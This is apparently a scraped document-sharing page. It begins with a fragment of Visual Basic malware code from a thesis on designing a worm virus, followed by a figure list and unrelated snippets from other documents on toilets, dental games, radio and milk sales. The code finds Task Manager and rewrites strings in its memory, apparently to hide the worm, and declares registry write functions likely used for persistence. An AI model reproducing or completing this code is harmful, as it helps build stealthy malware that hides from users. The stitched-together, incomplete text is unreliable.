REPSTRINGINPROC myProcess.th32ProcessID, Asal, Baru

newproclist$ = "[" & myProcess.th32ProcessID & "]"

While Process32Next(mySnapshot, myProcess)

If InStr(1, myproclist$, "[" & myProcess.th32ProcessID & "]") = 0 Then

If Left(myProcess.szExeFile, InStr(myProcess.szExeFile, Chr(0)) - 1) = "taskmgr.exe" Then

REPSTRINGINPROC myProcess.th32ProcessID, Asal, Baru

newproclist$ = newproclist$ & "[" & myProcess.th32ProcessID & "]"

Private Const KEY_READ = &H20000 Or &H1& Or &H8& Or &H10& Private Const KEY_WRITE = &H20000 Or &H2& Or &H4&

Public Const HKCU = &H80000001 Public Const HKLM = &H80000002 Private Const REG_SZ = 1

Private Const REG_DWORD = 4 Private Const ERROR_SUCCES = 0&

Private Declare Function RegOpenKeyEx Lib "advapi32.dll" Alias

"RegOpenKeyExA" (ByVal hKey As Long, ByVal lpsubkey As String, ByVal ulOptions As Long, ByVal samDesired As Long, phkResult As Long) As Long

Private Declare Function RegSetValueEx Lib "advapi32.dll" Alias "RegSetValueExA" (ByVal hKey As Long, ByVal lpValueName As String, ByVal Reserved As Long, ByVal dwType As Long, lpData As Any, ByVal cbData As Long) As Long

Private Declare Function RegQueryValueEx Lib "advapi32.dll" Alias "RegQueryValueExA" (ByVal hKey As Long, ByVal lpValueName As String, ByVal lpReserved As Long, ByVal lpType As Long, lpData As Any, ByVal lpcbData As Long) As Long

Gambar

Gambar 2.1 Tampilan Virus Creation Laboratory (VCL)
Gambar 2.2 Klasifikasi harmful program
Gambar 2.3 Gambaran fisik virus komputer
Gambar 3.1 Flowchart Rancangan Virus Worm
+7

Referensi

Dokumen terkait

• Jika Anda menggali lubang untuk toilet dan tanahnya sangat basah, atau jika lubangnya terisi dengan air, maka tempat tersebut adalah lokasi yang buruk untuk toilet.. • Harus

Disini penulis membuat game edukasi berbasis Unity 3D mengenai kesehatan gigi untuk anak-anak yang mana game ini nantinya dapat dijadikan sarana pembelajaran bagi

Menurut Iwan Sofana (2010, p. 239), Internetworking bisa diartikan sebagai network dari network, yang berarti kumpulan dari jaringan-jaringan yang menghubungkan

Radio merupakan media massa yang dapat dengan cepat menyebarkan. informasi tanpa harus melalui prosedur dan birokrasi yang bertele-tele,

Institutional and politi- cal changes appear to have offsetting influences on vulnerability to climatic changes, given present patterns of land use and ownership and the re- duced

Salah satu mata kuliah yang wajib diikuti oleh mahasiswa program kependidikan Universitas Negeri Semarang (UNNES) adalah Praktik Pengalaman Lapangan (PPL) yaitu semua

Radiograpi digunakan untuk memeriksa cacat coran bagian dalam untuk semua jenis logam. Pengujian dengan radiograpi menggunakan sinar x dan sinar gamma. Sinar x dihasilakan dari

L-Men sendiri merupakan produsen susu yang mulai dicari konsumen, penjualannya yang meningkat merupakan bukti animo masyarakat terhadap produk ini produk L-Men